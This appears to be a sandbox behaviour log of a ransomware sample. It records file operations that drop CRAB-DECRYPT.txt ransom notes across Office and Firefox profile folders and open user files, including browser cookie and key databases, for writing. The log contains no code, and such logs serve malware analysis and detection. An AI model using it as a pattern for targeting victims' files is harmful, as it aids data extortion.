Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\pWw3Texk6CwVcTz.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\TkryzlAhWDjxy.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\NXOcFmcZH0kfs1V2.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\cxc1c8A9xEZm1pp.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\FsFwfuaCG.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\1F9dzJR3Dq.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\o4isx.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\2XzzHT1hfS0s9l.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Pending Pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\m9asRMP8HoSL6.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\bookmarkbackups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\PlmVZkn.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\D9xhD4Vtl9zeKaqi.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\diCHxx1R37p96mJV.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\8KdP1zVgyza2WB4YuYBy.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\9HqwEbX7Ln7H.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\WINNT_x86_64-msvc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\9ZTbafp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\minidumps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\EdkUgdunNhUsDwiV5VL.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = size True 1
Fn
Get Info C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP type = file_attributes True 1
Fn
Get Info Z:\ggNuzUYFd.swf type = file_attributes True 1
Fn
Get Info Z:\QbYwYSoMD3beKw.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT.LOG1 type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT.LOG2 type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf type = file_attributes True 1
Fn
Get Info Z:\fUHonlL.swf type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp type = file_attributes True 1
Fn
Get Info Z:\brgVKnP3IVGPPX.pps type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl type = file_attributes True 1
Fn
Get Info Z:\PCEJlbmpwZ68QNsWdvWo.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg type = file_attributes True 1
Fn
Get Info Z:\zP0nKisr4oLuznV8Y.pptx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 type = file_attributes True 1
Fn
